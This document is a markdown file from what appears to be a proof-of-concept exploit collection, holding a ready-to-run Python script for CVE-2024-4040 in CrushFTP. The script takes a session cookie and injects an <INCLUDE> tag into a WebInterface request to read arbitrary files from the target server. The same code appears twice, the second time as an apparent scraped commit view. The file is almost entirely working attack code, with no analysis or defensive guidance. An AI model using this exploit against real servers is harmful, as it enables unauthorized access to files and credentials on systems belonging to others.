POC/wpoc/CrushFTP/CrushFTP服务器端模板注入(CVE-2024-4040).md

## CrushFTP服务器端模板注入(CVE-2024-4040)

## poc
```python
import requests
import argparse

HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'

def get_cookies(url):
    try:
        session = requests.Session()
        response = session.get(url)
        if response.status_code != 200:
            raise Exception("Failed to connect to the server")
        session.cookies.get_dict()
        return session.cookies.get_dict()
    except Exception as e:
        print(FAIL + "Error: " + str(e) + ENDC)
        quit()

def exploit(url, cookies, path):
    try:
        if not path.startswith("/") or not path.endswith("/"):
            raise Exception("Invalid path format. Path should start and end with '/'")
        url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
        response = requests.get(url, cookies=cookies)
        if response.status_code != 200:
            raise Exception("Failed to connect to the server")
        return response.text
    except Exception as e:
        print(FAIL + "Error: " + str(e) + ENDC)
        quit()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL of the target", required=True)
    parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
    args = parser.parse_args()
    url = args.url
    path = args.path
    if not url.startswith("http"):
        print(WARNING + "URL should start with 'http' or 'https'")
        quit()
    cookies = get_cookies(url)
    if 'currentAuth' not in cookies:
        print(WARNING + "Not vulnerable" + ENDC)
        quit()
    else:
        print(OKCYAN + exploit(url, cookies, path) + ENDC)
```
first commit 2025-03-04 23:12:57 +08:00			`## CrushFTP服务器端模板注入(CVE-2024-4040)`

			`## poc`
			```python
			`import requests`
			`import argparse`

			`HEADER = '\033[95m'`
			`OKBLUE = '\033[94m'`
			`OKCYAN = '\033[96m'`
			`OKGREEN = '\033[92m'`
			`WARNING = '\033[93m'`
			`FAIL = '\033[91m'`
			`ENDC = '\033[0m'`
			`BOLD = '\033[1m'`
			`UNDERLINE = '\033[4m'`

			`def get_cookies(url):`
			`try:`
			`session = requests.Session()`
			`response = session.get(url)`
			`if response.status_code != 200:`
			`raise Exception("Failed to connect to the server")`
			`session.cookies.get_dict()`
			`return session.cookies.get_dict()`
			`except Exception as e:`
			`print(FAIL + "Error: " + str(e) + ENDC)`
			`quit()`

			`def exploit(url, cookies, path):`
			`try:`
			`if not path.startswith("/") or not path.endswith("/"):`
			`raise Exception("Invalid path format. Path should start and end with '/'")`
			`url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"`
			`response = requests.get(url, cookies=cookies)`
			`if response.status_code != 200:`
			`raise Exception("Failed to connect to the server")`
			`return response.text`
			`except Exception as e:`
			`print(FAIL + "Error: " + str(e) + ENDC)`
			`quit()`

			`if __name__ == "__main__":`
			`parser = argparse.ArgumentParser()`
			`parser.add_argument("-u", "--url", help="URL of the target", required=True)`
			`parser.add_argument("-p", "--path", help="Path to the file to read", required=True)`
			`args = parser.parse_args()`
			`url = args.url`
			`path = args.path`
			`if not url.startswith("http"):`
			`print(WARNING + "URL should start with 'http' or 'https'")`
			`quit()`
			`cookies = get_cookies(url)`
			`if 'currentAuth' not in cookies:`
			`print(WARNING + "Not vulnerable" + ENDC)`
			`quit()`
			`else:`
			`print(OKCYAN + exploit(url, cookies, path) + ENDC)`
			```